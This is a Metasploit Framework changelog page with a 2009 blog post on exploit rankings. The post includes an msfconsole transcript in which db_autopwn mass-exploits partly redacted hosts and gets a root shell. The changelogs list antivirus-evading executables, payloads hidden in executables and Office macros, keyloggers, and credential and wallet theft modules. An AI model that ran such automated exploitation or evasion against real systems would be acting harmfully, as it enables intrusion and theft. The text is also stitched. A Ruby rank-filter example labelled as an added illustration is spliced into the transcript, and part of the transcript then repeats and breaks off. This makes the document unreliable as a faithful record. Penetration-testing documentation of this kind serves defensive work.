SOURCE: http://mac.softpedia.com/progChangelog/Metasploit-Framework-Changelog-[29516.html
What's new in Metasploit Framework 4.0.0:
August 4th, 2011
Statistics:
· Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
· 20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)
Highlights & New Features:
· This release marks the first major version change in five years. Please see the blog for more information.
· Several import parsers were rewritten to use Nokogiri for much faster processing of large import files.
· Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn't perfect nor is it nearly as complete as the Windows version, but many features already work.
· Java applet signing is now done directly in ruby, removing the need for a JDK for generating self-signed certificates.
· The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
· On a related note, Linux installers also ship with a working pcaprub extension. Expect pcap support in Windows to come later: #5117.
New Modules since 3.7.2:
New Exploit Modules:
· VSFTPD v2.3.4 Backdoor Command Execution
· Java RMI Server Insecure Default Configuration Java Code Execution
· HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
· HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
· Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
· Black Ice Cover Page ActiveX Control Arbitrary File Download
· Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
· MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview
· RealWin SCADA Server DATAC Login Buffer Overflow
· Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
· Iconics GENESIS32 Integer overflow version 9.21.201.01
· Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
· Sielco Sistemi Winlog Buffer Overflow
· Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
· HP OmniInet.exe Opcode 20 Buffer Overflow
· HP OmniInet.exe Opcode 27 Buffer Overflow
· Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview
New Post-Exploitation Modules:
· Winlogon Lockout Credential Keylogger
· Windows Gather Microsoft Outlook Saved Password Extraction
· Windows Gather Process Memory Grep
· Windows Gather Trillian Password Extractor
· Windows PCI Hardware Enumeration
· Windows Gather FlashFXP Saved Password Extraction
· Windows Gather Local and Domain Controller Account Password Hashes
· Windows Gather Nimbuzz Instant Messenger Password Extractor
· Windows Gather CoreFTP Saved Password Extraction
· Internet Download Manager (IDM) Password Extractor
· Windows Gather SmartFTP Saved Password Extraction
· Windows Gather Bitcoin wallet.dat
· Windows Gather Service Info Enumeration
· Windows Gather IPSwitch iMail User Data Enumeration
New Auxiliary Modules:
· John the Ripper Password Cracker Fast Mode
· Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
· Kaillera 0.86 Server Denial of Service
· 2Wire Cross-Site Request Forgery Password Reset Vulnerability
· SIPDroid Extension Grabber
· MSSQL Password Hashdump
Notable Features & Closed Bugs:
· Feature #4982 - Support for custom executable with psexec
· Feature #4856 - RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
· Feature #4578 - Update Nmap XML parsers to support Nokogiri parsing
· Feature #4417 - Post exploitation module to harvest OpenSSH credentials
· Feature #4015 - Increase test coverage for railgun
· Bug #4963 - Rework db_* commands for consistency
· Bug #4892 - non-windows meterpreters upload into the wrong filename
· Bug #4296 - Meterpreter stdapi registry functions create key if one doesn't exist
· Bug #3565 - framework installer fails on RHEL (postgres taking too long to start)
Armitage:
Armitage integrates with Metasploit 4.0 to:
· Take advantage of the new Meterpreter payload stagers
· Crack credentials with the click of a button
· Run post modules against multiple hosts
· Automatically log all post-exploitation activity
What's new in Metasploit Framework 3.7.0:
May 5th, 2011
Statistics:
· Metasploit now ships with 685 exploit modules, 355 auxiliary modules, and 39 post modules.
· 35 new exploits, 17 post-exploitation modules, and 15 auxiliary modules have been added since the last release.
Highlights & New Features:
Feature highlights:
· Support for SMB signing, enabling pass-the-hash and stolen password attacks against Windows 2008 Server environments.
· The Microsoft SQL Server mixin (and all modules) now supports NTLM authentication.
· Data import backend has undergone a rewrite, speeding up most import tasks by a factor of four.
· OS information is now normalized to make fingerprinting more accurate and easier to deal with.
Highlights from the new modules include:
· Apple iOS Backup File Extraction: Extract sensitive data from iTunes backup files (location, call history, SMS content, pictures, etc).
· Exploits for two different Adobe Flash vulnerabilities exploited in the wild.
· Code execution modules for MySQL and PostgreSQL when a valid login is available.
· Exploit for the Accellion File Transfer Appliance Default Encryption Key flaw found by Rapid7.
· Over ten new exploits for HP Network Node Manager (plus an HP OpenView exploit).
· Post-exploitation module for privilege escalation through the .NET Optimizer Service.
· Post-exploitation modules for stealing stored WinSCP and VNC passwords.
What's new in Metasploit Framework 3.5.1:
December 16th, 2010
Statistics:
· Metasploit now has 613 exploit modules and 306 auxiliary modules (from 551 and 261 respectively in v3.4)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (480K lines of Ruby)
· Over 85 tickets were closed since the last point release and over 130 since v3.4.0
General:
· Sessions now include additional information by default. This is often the username/hostname of the remote session.
· Dead sessions are now automatically detected and closed without requiring user interaction.
· The msfcli interface is now a thin wrapper around msfconsole; auxiliary modules and passive exploits now work.
· All modules now track which local user launched them (via module.owner)
· Resolve Windows error codes into descriptive strings
· Automatically choose a preferred "reverse" payload if none was specified
· Warn the user if an antivirus program has corrupted the installation (EICAR canary)
· A socks4a proxy auxiliary module is available capable of routing through a meterpreter session
· Host names will now resolve properly on Windows with Ruby 1.9.1+
· Improved performance and accuracy of FTP and telnet brute force scanners
Payloads:
· Java Meterpreter is now available for some Java exploits such as exploit/multi/browser/java_trusted_chain
· A race condition in concurrent incoming session handling has been fixed
· The reverse_https stager is more reliable through an additional wfs_delay
· The ReverseListenerBindAddress option can be used to override LHOST as the local bind address for reverse connect payloads
· The ReverseListenerComm option can be set to "local" to prevent the listener from binding through a Meterpreter pivot
· Bug fixes for proper socket cleanup in exploit and auxiliary modules, even after exceptions are thrown
· Allow the IPv6 Bind stagers to work over Teredo tunnels
Plugins:
· Lab plugin added to manage target VMs
· Support for managing Nessus scans from the console via Zate Berg's plugin
Meterpreter Scripts:
· All scripts now run in the context of an anonymous class, with access to shared methods
· A script has been added by scriptjunkie for automatically exploiting weak service permissions
· Tab completion for the "run" command now looks in ~/.msf3/scripts/meterpreter/
· All credential-related tools (credcollect, hashdump, etc) now use the new creds database table
Meterpreter Core:
· Only a single SSL certificate is generated for all Meterpreter sessions per instance of Metasploit
· The AutoSystemInfo option can be disabled if username, hostname, and admin status should not be automatically obtained
· RAILGUN has been merged into the STDAPI extension and x64 support has been added
· Support slow/laggy connections better through extended timeouts
· Automatically close file, registry, process, thread, and event handles through finalizers
· Search for files (using the Windows index where available)
Database:
· A new db_export command has been added that produces db_import compatible XML snapshots of a given workspace
· Web site and web application data are now stored in the web_sites, web_pages, web_forms, and web_vulns tables
· Import of both NeXpose Raw XML and NeXpose Simple XML has been improved
· Import support has been added for Retina and NetSparker XML
· The Nessusv2 XML format now uses an improved SAX-based parser
· The connection pool size has been reduced to match PostgreSQL defaults
· Cracked credentials now have their own database table (creds) instead of being a subclass of notes
· New exploited_hosts table added to streamline bookkeeping of successful session generation
· db_import more robust in the face of badly-formatted data
· report_note and report_vuln now automatically create associated hosts and services in the database if absent
GUI:
· A new Java GUI has been created to replace the GTK interface, which relied on unmaintained and buggy libraries
· The new GUI uses the XMLRPC interface to control Metasploit
· It supports launching modules, viewing running jobs and sessions, and interacting with sessions
· It can generate, encode, and save payloads with the features of msfencode
· It integrates support for most Meterpreter scripts
· It provides support for handling plugins
· It supports database connection, and allows viewing the database as well as limited interaction with the database
Deprecated:
· The msfweb interface is no longer included. This interface was marked as unsupported 12 months ago and no suitable replacements were found.
· The GTK interface is no longer included and has been replaced by scriptjunkie's Java GUI that uses the XMLRPC protocol.
· The sqlite3 backend is no longer supported and may be removed entirely in an upcoming point release. Use PostgreSQL or MySQL instead.
· The VNC stage for the old DLL injection stager (patchup) has been removed due to compatibility issues
· Deprecated specific filetypes for db_import_* commands; users should use just "db_import"
What's new in Metasploit Framework 3.4.1:
October 20th, 2010
Statistics:
· Metasploit now has 551 exploit modules and 261 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (400K lines of Ruby)
· Over 100 tickets were closed since the last point release and over 200 since v3.3
General:
· The dns_enum auxiliary module now supports bruteforcing IPv6 AAAA records thanks to a patch from Rob Fuller
· Command shell sessions can now be automated via scripts using an API similar to Meterpreter
· The console can be automated using Ruby code blocks within resource files
· Initial sound support is available by loading the "sounds" plugin
· The Report mixin and report_* methods are now one-way: you can write to the database but not work with the results. This increases the scalability of the database.
· Many modules report information to the database by default now (auxiliary/scanner/*)
· Lotus Domino version, login bruteforce, and hash collector auxiliary modules
· Upgrade any command shell session to Meterpreter via sessions -u (Windows only)
· The VNC injection payload now uses the latest TightVNC codebase and bypasses Session 0 isolation
· Several modules were renamed to include their Microsoft Technet bulletin number, e.g. ie_xml_corruption is now ms08_078_xml_corruption
· Code can now interface directly with an installed Java Development Kit via a Java mixin. See the java_signed_applet exploit for an example.
· Tomcat and JBoss installations can be exploited to gain sessions (Windows x86/x64, Linux x86/x64)
· The msfencode utility can now generate WAR payloads for Tomcat and JBoss
· Oracle XDB SID brute forcing is much more comprehensive thanks to Thomas Ring
· The msfencode utility can now inject into an existing executable while keeping the original functionality
· The XMLRPC server has been improved and additional APIs are available
· The db_import command now supports NeXpose Simple XML, NeXpose Export XML, Nessus (NBE, XMLv1, XMLv2), QualysGuard XML, and Nmap
· The sqlite3 driver has been deprecated. To ease the transition away from sqlite3, the postgres driver is installed by default in the Linux installer.
· There is a new db_status command that shows which driver is currently in use and whether your database connection is active
Bruteforce Support:
· Account brute forcing has been standardized across all login modules
· Login and version scanning module names have been standardized
· The SSH protocol is now supported for brute force and fingerprint scans
· The telnet_login and ssh_login modules now create sessions
· MySQL is now supported for brute forcing, enumeration, service fingerprinting, and arbitrary SQL queries
· Postgres fingerprinting (pre-authentication) using the line numbers in the error messages
· Tomcat is now supported for brute forcing and session creation
Meterpreter:
· The Meterpreter process management APIs and commands can now see all processes on WinNT 4.0 -> Windows 7 (32 & 64)
· The Meterpreter can now migrate from 32 to 64 and from 64 to 32, in addition to using a new mechanism to do the migration.
· The Meterpreter adds the steal_token, drop_token, getprivs, and getsystem commands (including kitrap0d integration)
· The Meterpreter pivoting system now supports bidirectional UDP and TCP sockets
· The Meterpreter protocol handler now supports ZLIB compression of data blocks
· The Meterpreter can now take screenshots (jpeg) without process migration and bypasses Session 0 isolation
· The Meterpreter can now stage over a fully-encrypted SSL 3.0 connection using the reverse_https stager
· The Meterpreter and Command Shell scripts are now evaluated in the context of a new Rex::Script object
· The "hashdump" Meterpreter script provides a safe way to dump hashes for the local user accounts
· Automatically route through new subnets with the auto_add_route plugin
Known issues:
· To deal with the myriad database synchronization issues, particularly in the sqlite3 driver, the database is write-only for the most part.
· When gems containing non-UTF8 characters are installed on the system, starting the framework fails with Encoding::UndefinedConversionError in ruby 1.9.x; this is bug #1914
· Interacting with a Meterpreter session while it is in the middle of migrating will cause the migration to fail and kill the session; this is bug #1360
· In some cases, backgrounded sessions have no output handle and can potentially lose data that should be printed to the console; this is bug #1982.
What's new in Metasploit Framework 3.3.3:
March 31st, 2010
· All exploits now contain a ranking that indicates how dangerous the default settings are to the target host.
· The search command now takes a -r option to specify a minimum ranking of modules to return.
· The db_autopwn and nexpose_scan commands now take a -R option to specify a minimum ranking of modules to run.
· The InitialAutoRunScript option has been added to Meterpreter, providing a way for exploits to specify required post-exploit tasks (migrate out of a dying process).
· JRuby 1.4.0 can be used to run some parts of the framework; however, it is not supported or recommended at this time.
· The sessions command can now run a single command (-c) or a script (-s) on all open sessions at once.
· The Win32 EXE template is now smaller (37k from 88k).
What's new in Metasploit Framework 3.3.1:
December 6th, 2009
· Metasploit now has 453 exploit modules and 218 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit now integrates with all editions of NeXpose (see NeXpose_Plugin)
· The msfconsole now stores and loads history automatically
· The Linux installer now correctly unsets GEM_PATH to avoid gem installation conflicts
· Generated Windows executables are much more random and AV-resistant
· WMAP reporting now uses the notes table instead of a separate set of reporting tables
· Auxiliary scanners are now much more stable on Ruby 1.9.1
· Meterpreter migration sanity checks added
· The Windows installer now includes Nmap 5.10BETA1
What's new in Metasploit Framework 3.3:
November 17th, 2009
Statistics:
· Metasploit now has 443 exploit modules and 216 auxiliary modules (from 320 and 99 respectively in v3.2)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (375k lines of Ruby)
· Over 170 tickets were closed during the 3.3 development process
General:
· Ruby 1.9.1 is now supported and recommended
· Windows Vista and Windows 7 are now supported
· Major improvements in startup speed thanks to patches from Yoann Guillot
Windows:
· The msfconsole is now the primary user interface on Windows (using RXVT)
· The Windows installer now uses Ruby 1.9.1 (cygwin)
· The Windows installer now ships with Cygwin 1.7
· The Windows installer now comes in full and mini editions
· The Windows installer can be launched silently with /S /D=C:path
· The Windows installation is now portable and can be installed to USB
· The Windows installation works on 64-bit Windows if launched in Compatibility Mode
· The Windows installer now offers to install Nmap 5.0 for your convenience
Linux:
· Standalone Linux installers are now available for 32-bit and 64-bit Linux. These installers contain a complete execution environment, including Ruby 1.9.1, Subversion, and dependent libraries.
· The preferred installation location is /opt/metasploit3/msf3; please see the Ubuntu and generic Linux installation guides for more information.
msfconsole:
· The startup banner now includes the number of days since the last update and the svn revision
· The RbReadline library is used by default, allowing msfconsole to work on systems without libreadline
· The -L parameter to msfconsole now allows the system Readline to be used if necessary
· A new 'connect' command, similar to netcat, that can use meterpreter routes
· Colorized output on terminals that support it. This can be disabled (or forced on) with the 'color' command
msfencode:
· Win32 payloads can now be embedded into arbitrary executables using 'msfencode -t exe -x MYFILE.exe -o MYNEWFILE.exe'.
· Win64 payloads can now be embedded into arbitrary 64-bit executables using 'msfencode -a x64 -e x64/xor -t exe -o MYNEWFILE.exe'.
· The default executable size for generated Win32 binaries now depends on the size of data/templates/template.exe. As of the release, this file is approximately 80k.
· Payloads can be generated as VBS scripts using the -t vbs option to msfencode. Persistent (looping) payloads can be generated with -t loop-vbs.
· Payloads can be generated as VBA macros for embedding into Office documents. The output is in two parts: the first must be pasted into the Macro editor, the second (hex) must be pasted at the end of the Word document.
· The x86/alpha_mixed and x86/alpha_upper encoders now accept the AllowWin32SEH option (boolean) to use a SEH GetPC stub and generate 100% alphanumeric output.
msfxmlrpcd:
· This is a standalone Metasploit server that accepts authenticated connections over SSL.
· The demonstration client, msfxmlrpc, can be used to call the remote API
Database:
· Database support is now active as long as rubygems and at least one database driver are installed. The db_* plugins are no longer necessary and have been deprecated.
· The vulnerabilities table now references the host as the parent table and not the service. This allows vulnerability information that is not tied to an exposed service to be imported.
Exploits:
· All applicable exploits now have OSVDB references thanks to a major effort by Steve Tornio
· New aix/rpc_ttdbserverd_realpath exploit module, which targets the latest versions of the IBM AIX operating system (5.3.7 to 6.1.4)
· Support for the Oracle InstantClient Ruby driver as an exploit mixin
· Support for the TDS protocol (MSSQL/Sybase) using a custom native Ruby driver (MSSQL 2000 -> 2008)
· Extensive support for exploitation and post-exploitation tasks against Oracle databases
· Extensive support for exploitation and post-exploitation tasks against Microsoft SQL Server databases
· The browser_autopwn module was completely rewritten using much more robust fingerprinting methods
· SOCKS4, SOCKS5, and HTTP proxies work much better now
Payloads:
· The Windows stagers now support NX platforms by allocating RWX memory using VirtualAlloc. The stagers have been updated to perform reliable stage transfer without a middle stager requirement.
· The reverse_tcp stager now handles connection failures gracefully by calling EXITFUNC when the connection fails. This stager can also try to connect more than once, which is useful for unstable network connections. The default number of connection attempts is 5 and can be controlled via the ReverseConnectRetries advanced option. Setting this value to 255 will cause the stager to retry the connection indefinitely.
· The reverse_tcp_allports stager has been added; it cycles through all 65,535 possible ports trying to connect back to the Metasploit console
· The ExitThread EXITFUNC now works properly against newer versions of Windows
· The CMD payloads now indicate support for specific userland tools on a per-exploit level
· The Windows stagers now support Windows 7
· New payload modules for Linux on POWER/PowerPC/CBEA
· New payload modules for Java Server Pages (JSP)
· New payload modules for Windows x64
· New payload modules for IBM AIX operating systems (versions 5.3.7 to 6.1.4)
Auxiliary:
· Scanner modules now run each thread in its own isolated module instance
· Scanner modules now report their progress (configurable via the ShowProgress and ShowProgressPercent advanced options).
· A simple fuzzer API is now available as well as 15 example modules covering HTTP, SMB, TDS, DCERPC, WiFi, and SSH.
· Ryan Linn's HTTP NTLM capture module has been integrated
· Support for the DECT protocol and DECT mixins have been integrated (using the COM-ON-AIR hardware)
· Support for the Lorcon2 library including a new Ruby-Lorcon2 extension
· Addition of airpwn and dnspwn modules to perform spoofing with raw WiFi injection using Lorcon2
· The pcaprub extension has been updated to build and run properly under Ruby 1.9.1
· Max Moser's pSnuffle packet sniffing framework has been integrated into Metasploit
Meterpreter:
· The Meterpreter now uses Stephen Fewer's Reflective DLL Injection technique by default as opposed to the old method developed by skape and jt.
· The Meterpreter now uses OpenSSL to emulate an HTTPS connection once the staging process is complete. After metsrv.dll is initialized, the session is converted into an SSLv3 link using a randomly generated RSA key and certificate. The target side then sends a fake GET request through the SSL link to mimic the traffic patterns of a real HTTPS client.
· The Meterpreter AutoRunScript parameter now accepts script arguments and multiple scripts. Each script and its arguments should be separated by commas.
· The Meterpreter can now take screen shots using the 'espia' extension and the 'screenshot' command. To use this feature, enter "use espia" and "screenshot somepath.bmp" from the meterpreter prompt.
· The Meterpreter can now capture traffic on the target's network. This is handled in-memory using the MicroOLAP Packet SDK. This extension can buffer up to 200,000 packets at a time. To use this feature, enter "use sniffer" and "sniffer_start" from the meterpreter prompt.
· The Meterpreter now supports keystroke logging by migrating itself into a process on the target desktop and using the keyscan_start and keyscan_dump commands.
· The Meterpreter now supports the "rm" file system command.
· The Meterpreter now supports the "background" command for when Ctrl-Z isn't feasible.
· The Meterpreter now supports 64-bit Windows.
· Alexander Sotirov's METSVC has been added to the Metasploit tree and stub payloads are available to interact with it
Meterpreter POSIX:
· The basic framework for Meterpreter on Linux, BSD, and other POSIX platforms was completed by JR
· The stdapi extension has been partially ported to the POSIX platform
Meterpreter Scripts:
· All scripts now accept a "-h" argument to show usage
Deprecated:
· The msfgui interface is not actively maintained and is looking for a new community owner
· The msfweb interface is not actively maintained and is looking for a new community owner
· The msfopcode command line utility is disabled until the Opcode Database is updated
· The msfopcode client API is disabled until the Opcode Database is updated and restored
Wednesday, December 23, 2009
Metasploit Framework 3.3.3 Exploit Rankings
This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to prevent exploits below a certain rank from being used and limit the impact to a particular target.
The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The wiki page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:
msf> search -r great
From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:
msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi
msf (exploit/ms08_067_netapi) > exploit
[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).
The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the nexpose_scan or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:
msf exploit(psexec) > db_autopwn -b -x -t
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.41.188:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.47.203:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.37.182:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.32.2:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.32.2:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.44.223:139 exploit/solaris/samba/trans2open (CVE-2003-0201, BID-7294)
[*] XX.YY.44.223:139 exploit/multi/samba/nttrans (CVE-2003-0085, BID-7106)
[*] XX.YY.47.203:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.47.203:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.72.243:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.72.243:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.37.182:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.34.236:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.198.128:45146 -> XX.YY.44.223:32554 unix/webapp/qtss_parse_xml_exec
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC Power Macintosh powerpc
id
uid=0(root) gid=0(wheel) groups=0(wheel)
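As an added illustration (not code from the Metasploit project or from the original post), the following Ruby models the rank gate described above: the search -r filter, the MinimumRank check with its exploit -f override, and the db_autopwn -R filter applied to match lines in the format the transcript prints. The numeric rank values and the ranks assigned to the sample modules are assumptions, chosen so the results agree with the -R excellent run shown above.

```ruby
# Added example, not Metasploit code: a model of the exploit-rank gate that
# 3.3.3 introduced. Rank names and their order come from the post; the
# numeric values below are assumed for illustration (only the order matters).
RANKS = {
  "excellent" => 600,
  "great"     => 500,
  "good"      => 400,
  "normal"    => 300,
  "average"   => 200,
  "low"       => 100,
  "manual"    => 0,
}.freeze

class RankError < StandardError; end

# Numeric value of a rank name; anything outside the seven names is an error.
def rank_value(name)
  RANKS.fetch(name.to_s.downcase) { raise RankError, "unknown rank '#{name}'" }
end

# True when a module of rank mod_rank is at or above min_rank.
def meets_rank?(mod_rank, min_rank)
  rank_value(mod_rank) >= rank_value(min_rank)
end

# Models `search -r <min_rank>`: module names ranked at or above min_rank,
# best rank first, alphabetical within a rank so the order is deterministic.
def search_by_rank(modules, min_rank)
  modules.select { |m| meets_rank?(m[:rank], min_rank) }
         .sort_by { |m| [-rank_value(m[:rank]), m[:name]] }
         .map { |m| m[:name] }
end

# Models the MinimumRank check on `exploit`: returns [allowed, message].
# force: true is the equivalent of `exploit -f`.
def exploit_decision(mod, min_rank, force: false)
  return [true, "running #{mod[:name]} (forced)"] if force
  return [true, "running #{mod[:name]}"] if meets_rank?(mod[:rank], min_rank)
  [false, "#{mod[:name]} is below the minimum rank, '#{min_rank}'"]
end

# One match line as printed by `db_autopwn -t` in the transcript:
#   [*] host:port exploit/path/name (references)
MATCH_LINE = %r{\A\[\*\] (?<target>\S+) (?<mod>exploit/\S+) \((?<refs>[^)]*)\)\z}

# Models `db_autopwn -t -R <min_rank>`: keeps "target module" pairs whose
# exploit meets the minimum rank. Lines that do not parse, or whose module
# has no known rank, are left out rather than run by default.
def filter_matches(lines, min_rank, rank_by_module)
  lines.each_with_object([]) do |line, kept|
    m = MATCH_LINE.match(line.strip)
    next unless m
    rank = rank_by_module[m[:mod]]
    next unless rank
    kept << "#{m[:target]} #{m[:mod]}" if meets_rank?(rank, min_rank)
  end
end

# Constructed sample data. Module names are the ones in the transcript; the
# ranks are assumed, chosen so the result agrees with the `-R excellent` run.
SAMPLE_MODULES = [
  { name: "exploit/windows/smb/ms08_067_netapi",     rank: "great" },
  { name: "exploit/windows/smb/psexec",              rank: "excellent" },
  { name: "exploit/osx/samba/lsa_transnames_heap",   rank: "average" },
  { name: "exploit/windows/dcerpc/ms03_026_dcom",    rank: "great" },
  { name: "exploit/unix/webapp/qtss_parse_xml_exec", rank: "excellent" },
].freeze

RANK_BY_MODULE = Hash[SAMPLE_MODULES.map { |m| [m[:name], m[:rank]] }].freeze

# Constructed match lines, copied in shape from the transcript (XX.YY are the
# post's own redacted octets).
SAMPLE_MATCH_LINES = [
  "[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)",
  "[*] XX.YY.41.188:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)",
  "[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504)",
  "[*] XX.YY.37.182:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)",
  "[*] XX.YY.47.203:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)",
].freeze

if __FILE__ == $0
  puts "search -r great:"
  search_by_rank(SAMPLE_MODULES, "great").each { |n| puts "  #{n}" }
  puts exploit_decision(SAMPLE_MODULES[0], "excellent").last
  puts "db_autopwn -t -R excellent:"
  filter_matches(SAMPLE_MATCH_LINES, "excellent", RANK_BY_MODULE).each { |t| puts "  #{t}" }
end
```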
[*] XX.YY.72.243:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.72.243:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.37.182:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.34.236:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.198.128:45146 -> XX.YY.44.223:32554 unix/webapp/qtss_parse_xml_exec
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC Power Macintosh powerpc
id
